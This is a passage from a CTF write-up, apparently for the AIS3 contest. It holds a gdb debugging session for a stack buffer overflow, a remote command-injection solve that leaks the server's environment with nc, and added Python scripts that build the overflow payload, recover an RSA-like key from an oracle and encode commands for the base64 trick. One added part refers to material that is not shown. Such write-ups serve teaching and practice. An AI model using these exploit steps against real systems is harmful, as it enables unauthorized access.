rdi            0x7fffffffbcd0      140737488338128
rbp            0x7fffffffdf20      0x7fffffffdf20
rsp            0x7fffffffdf10      0x7fffffffdf10
r8             0x6d                109
r9             0x7fffffff          2147483647
r10            0x0                 0
r11            0x246               582
r12            0x7fffffffe038      140737488347192
r13            0x4012a4            4199076
r14            0x0                 0
r15            0x7ffff7ffd040      140737354125376
rip            0x401326            0x401326 <main+130>
eflags         0x202               [ IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) info frame
Stack level 0, frame at 0x7fffffffdf30:
 rip = 0x401326 in main; saved rip = 0x4848484847474747
 Arglist at 0x7fffffffdf20, args:
 Locals at 0x7fffffffdf20, Previous frame's sp is 0x7fffffffdf30
 Saved registers:
  rbp at 0x7fffffffdf20, rip at 0x7fffffffdf28
(gdb) break *main+131
Breakpoint 3 at 0x401327
(gdb) c
Continuing.

Breakpoint 3, 0x0000000000401327 in main ()
(gdb) info registers
rax            0x0                 0
rbx            0x0                 0
rcx            0x7ffff7e97a37      140737352661559
rdx            0x0                 0
rsi            0x7fffffffbdf0      140737488338416
rdi            0x7fffffffbcd0      140737488338128
rbp            0x4646464645454545  0x4646464645454545
rsp            0x7fffffffdf28      0x7fffffffdf28
r8             0x6d                109
r9             0x7fffffff          2147483647
r10            0x0                 0
r11            0x246               582
r12            0x7fffffffe038      140737488347192
r13            0x4012a4            4199076
r14            0x0                 0
r15            0x7ffff7ffd040      140737354125376
rip            0x401327            0x401327 <main+131>
eflags         0x202               [ IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) info frame
Stack level 0, frame at 0x7fffffffdf28:
 rip = 0x401327 in main; saved rip = 0x4848484847474747
 Arglist at 0x4646464645454545, args:
 Locals at 0x4646464645454545, Previous frame's sp is 0x7fffffffdf30
 Saved registers:
  rip at 0x7fffffffdf28
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401327 in main ()
(gdb) run < exp
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/c/Downloads/bof2win/share/bof2win < exp
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
What's your name? Hello, AAAABBBBCCCCDDDDEEEEFFFF@!

Breakpoint 2, 0x0000000000401326 in main ()
(gdb) info frame
Stack level 0, frame at 0x7fffffffdf30:
 rip = 0x401326 in main; saved rip = 0x401216
 Arglist at 0x7fffffffdf20, args:
 Locals at 0x7fffffffdf20, Previous frame's sp is 0x7fffffffdf30
 Saved registers:
  rbp at 0x7fffffffdf20, rip at 0x7fffffffdf28
(gdb) c
Continuing.

Breakpoint 3, 0x0000000000401327 in main ()
(gdb) info frame
Stack level 0, frame at 0x7fffffffdf28:
 rip = 0x401327 in main; saved rip = 0x401216
 Arglist at 0x4646464645454545, args:
 Locals at 0x4646464645454545, Previous frame's sp is 0x7fffffffdf30
 Saved registers:
  rip at 0x7fffffffdf28
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00000000004012a3 in get_the_flag ()
(gdb) disassemble get_the_flag
[... identical to the listing above, except that gdb now marks the current instruction: ...]
   0x00000000004012a2 <+140>:   leave
=> 0x00000000004012a3 <+141>:   ret
End of assembler dump.
(gdb) run < exp
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/c/Downloads/bof2win/share/bof2win < exp
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
What's your name? Hello, AAAABBBBCCCCDDDDEEEEFFFF@!

Breakpoint 2, 0x0000000000401326 in main ()
(gdb) c
Continuing.

Breakpoint 3, 0x0000000000401327 in main ()
(gdb) info frame
Stack level 0, frame at 0x7fffffffdf28:
 rip = 0x401327 in main; saved rip = 0x401216
 Arglist at 0x4646464645454545, args:
 Locals at 0x4646464645454545, Previous frame's sp is 0x7fffffffdf30
 Saved registers:
  rip at 0x7fffffffdf28
(gdb) disassemble main
[... identical to the listing above, except that gdb now marks the current instruction: ...]
   0x0000000000401326 <+130>:   leave
=> 0x0000000000401327 <+131>:   ret
End of assembler dump.
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
(gdb) run < exp
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/c/Downloads/bof2win/share/bof2win < exp
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
What's your name? Hello, AAAABBBBCCCCDDDDEEEEFFFF@!

Breakpoint 2, 0x0000000000401326 in main ()
(gdb) c
Continuing.

Breakpoint 3, 0x0000000000401327 in main ()
(gdb) info frame
Stack level 0, frame at 0x7fffffffdf28:
 rip = 0x401327 in main; saved rip = 0x7f0000401216
 Arglist at 0x4646464645454545, args:
 Locals at 0x4646464645454545, Previous frame's sp is 0x7fffffffdf30
 Saved registers:
  rip at 0x7fffffffdf28
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007f0000401216 in ?? ()
(gdb) Quit
(gdb) run < exp
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/c/Downloads/bof2win/share/bof2win < exp
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
What's your name? Hello, AAAABBBBCCCCDDDDEEEEFFFF@!

Breakpoint 2, 0x0000000000401326 in main ()
(gdb) info registers
[... as at Breakpoint 2 above, except r8 = 0x24 (36) ...]
(gdb) info frame
Stack level 0, frame at 0x7fffffffdf30:
 rip = 0x401326 in main; saved rip = 0x401216
 Arglist at 0x7fffffffdf20, args:
 Locals at 0x7fffffffdf20, Previous frame's sp is 0x7fffffffdf30
 Saved registers:
  rbp at 0x7fffffffdf20, rip at 0x7fffffffdf28
(gdb) c
Continuing.

Breakpoint 3, 0x0000000000401327 in main ()
(gdb) info registers
[... as at Breakpoint 3 above, except r8 = 0x24 (36) ...]
(gdb) c
Continuing.
AIS3{test}

Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
(gdb)
```
:::

```
AIS3{Re@1_B0F_m4st3r!!}
```

## Seadog's Webshell [498 pts]

### Challenge

```shell
#!/bin/sh
exec 2>/dev/null
base64 | cat
```

### Solve

The service base64-*encodes* whatever arrives on stdin and passes it on, so send the bytes whose base64 encoding is the command we want: `base64 -d` of the string `printenv` locally. Once stdin reaches EOF the server's `base64` emits `printenv`, and, as the output shows, whatever consumes the script's output runs it with the flag in its environment (the flag itself decodes to `escaping_base64_with_eof`). This only works for commands made entirely of base64 alphabet characters with a length that is a multiple of four, which `printenv` is.

```shell
ch@CHSMB tmp % echo -n "printenv" | base64 -d | nc chals1.ais3.org 12369
REMOTE_HOST=::ffff:10.113.193.33
HOSTNAME=06e23c9f6627
PWD=/
_=/usr/sbin/printenv
HOME=/root
LANG=en_US.UTF-8
FLAG=AIS3{ZXNjYXBpbmdfYmFzZTY0X3dpdGhfZW9m}
SHLVL=1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
```

---

## Scoreboard

:::spoiler
![](https://i.imgur.com/HH8XJKy.jpg)
:::

---

https://github.com/ashutosh1206/Crypton
https://cryptohack.org/
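Worked example for the Really Strange orAcle idea above (added here; it is not the write-up's solver): a local stand-in for the oracle, using a 127-bit Mersenne prime instead of a 1024-bit strong prime so it runs in well under a second, plus the three steps from the idea: recover `n` from `gcd(k·k - s)`, recover `e` from the oracle's answer for `1+p`, and decrypt. The `Oracle` class, the prime, and the Miller-Rabin helper are assumptions made for this demo.

```python
import math
import random


def is_probable_prime(n, rounds=32):
    """Miller-Rabin with random bases (demo quality; not a constant-time routine)."""
    if n < 2:
        return False
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % sp == 0:
            return n == sp
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


class Oracle:
    """Local stand-in for the challenge service: n = p*p and an odd prime e < p, both hidden from the caller."""

    def __init__(self, p, e):
        assert is_probable_prime(p) and is_probable_prime(e) and 3 <= e < p
        self._p, self._e, self._n = p, e, p * p

    def encrypt(self, x):
        if x < 0:
            raise ValueError("non-negative integers only")
        return pow(x, self._e, self._n)


def recover_n(oracle, rng=random):
    """k = a^e mod n and s = (a^2)^e mod n satisfy k^2 ≡ s (mod n), so n divides k*k - s.
    The gcd of several such differences shrinks to n; stop once it is the square of a prime."""
    g = 0
    while True:
        a = rng.randrange(1 << 100, 1 << 101)  # large enough that a^(2e) > n even for tiny e
        k = oracle.encrypt(a)
        s = oracle.encrypt(a * a)
        g = math.gcd(g, k * k - s)
        p = math.isqrt(g)
        if g > 1 and p * p == g and is_probable_prime(p):
            return g, p


def recover_e(oracle, p):
    """(1 + p)^e ≡ 1 + e*p (mod p^2): every higher binomial term contains p^2.
    This is the discrete log in the subgroup generated by 1+p that Paillier decryption relies on."""
    r = oracle.encrypt(1 + p)
    assert (r - 1) % p == 0
    return (r - 1) // p % p  # the challenge draws e below p, so e mod p is e itself


def decrypt(c, p, e):
    """(Z/p^2)^* has order p*(p-1); a message coprime to p decrypts with d = e^-1 mod p(p-1)."""
    phi = p * (p - 1)
    if math.gcd(e, phi) != 1:
        raise ValueError("e shares a factor with p(p-1); this key is not invertible")
    d = pow(e, -1, phi)
    return pow(c, d, p * p)


if __name__ == "__main__":
    p = (1 << 127) - 1  # demo prime; the challenge uses getStrongPrime(1024)
    oracle = Oracle(p, 65537)
    n, p_found = recover_n(oracle)
    e_found = recover_e(oracle, p_found)
    m = int.from_bytes(b"AIS3{local_demo_only}", "big")
    print(n == p * p, e_found, decrypt(oracle.encrypt(m), p_found, e_found) == m)
```

Two caveats that carry over to the real challenge: the recovered `e` is only `e mod p`, which equals `e` because the service draws it below `p`; and the padded flag must be smaller than `n` and coprime to `p` for the final `pow` to give it back.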
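Added example for BOF2WIN (not the write-up's `main.py`): derive the overwrite offset from the `lea -0x10(%rbp),%rax` that precedes the `gets` call in the disassembly above, and emit the payload as raw bytes so that return addresses containing bytes ≥ 0x80 survive unchanged. The disassembly snippet embedded below is copied from the gdb session; the `get_the_flag` address is the one in the write-up.

```python
import re
import struct
import sys

# Lines copied from the gdb `disassemble main` output in the write-up (the relevant four of them).
MAIN_DISASM = """
   0x00000000004012f8 <+84>:    lea    -0x10(%rbp),%rax
   0x00000000004012fc <+88>:    mov    %rax,%rdi
   0x00000000004012ff <+91>:    mov    $0x0,%eax
   0x0000000000401304 <+96>:    call   0x401100 <gets@plt>
"""
GET_THE_FLAG = 0x401216


def gets_buffer_offset(disasm):
    """Distance of the gets() buffer below rbp: the last `lea -0xNN(%rbp),%rax` before the gets@plt call.
    Assumes the usual frame (push rbp; mov rsp,rbp): saved rbp at rbp, return address at rbp+8."""
    offset = None
    for line in disasm.splitlines():
        m = re.search(r"lea\s+-0x([0-9a-f]+)\(%rbp\),%rax", line)
        if m:
            offset = int(m.group(1), 16)
        if "<gets@plt>" in line:
            if offset is None:
                raise ValueError("no rbp-relative lea before the gets() call")
            return offset
    raise ValueError("gets@plt call not found")


def build_payload(buf_offset, target, filler=b"A"):
    """buf_offset bytes of buffer + 8 bytes of saved rbp, then the little-endian return address."""
    payload = filler * (buf_offset + 8) + struct.pack("<Q", target)
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a; gets() would stop reading there")
    return payload


if __name__ == "__main__":
    offset = gets_buffer_offset(MAIN_DISASM)
    # raw bytes, not print(): print() re-encodes anything >= 0x80 as UTF-8 and would corrupt the address
    sys.stdout.buffer.write(build_payload(offset, GET_THE_FLAG) + b"\n")
    # python3 this.py > exp && nc chals1.ais3.org 12347 < exp
```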
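Added example for Seadog's Webshell (not from the write-up): the local side of the trick, with a check for which commands can be produced at all, and a model of what `base64 | cat` does with the bytes. `server_side` is an assumption that omits `base64`'s 76-column line wrapping, which does not matter for inputs this short.

```python
import base64
import re

B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+$")


def can_round_trip(command):
    """A command comes out of the server's `base64` unchanged only if it is itself unpadded base64:
    alphabet characters only, and a length that is a multiple of 4 (no spaces, semicolons, dashes)."""
    return bool(B64_ALPHABET.match(command)) and len(command) % 4 == 0


def bytes_to_send(command):
    """The bytes whose base64 encoding is exactly `command`; these go to the socket."""
    if not can_round_trip(command):
        raise ValueError(f"{command!r} cannot be the output of base64 encoding")
    raw = base64.b64decode(command)
    assert base64.b64encode(raw).decode() == command  # round trip, as `echo -n cmd | base64 -d` relies on
    return raw


def server_side(stdin_bytes):
    """What `base64 | cat` emits for the bytes it read up to EOF (wrapping omitted; see lead-in)."""
    return base64.b64encode(stdin_bytes) + b"\n"


if __name__ == "__main__":
    for cmd in ("printenv", "id", "cat /flag"):
        print(cmd, can_round_trip(cmd))
    print(server_side(bytes_to_send("printenv")))
```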